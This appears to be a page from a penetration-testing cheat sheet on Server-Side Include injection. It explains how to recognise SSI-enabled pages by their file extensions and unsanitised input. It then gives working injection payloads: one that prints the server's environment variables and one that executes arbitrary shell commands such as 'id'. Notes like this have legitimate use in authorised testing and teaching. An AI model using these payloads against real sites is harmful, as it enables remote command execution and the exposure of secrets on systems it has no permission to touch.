SSI (EXPLOITATION)

#identification of SSI usage
 * the page may support SSI based on the file extension .shtml, .shtm, and .stm.
 * if the user input is inserted into the page without prior sanitization, it might be vulnerable to SSI injection

root@oco:~$ BROWSER > {targetSite:port}
 input field: <!--#printenv -->
 * this cmd displays the environment variables

#execute arbitrary cmds 
root@oco:~$ BROWSER > {targetSite:port}
 input field: <!--#exec cmd="id" -->

PreviousSSI INJECTION NextXSLT INJECTION

Last updated 6 months ago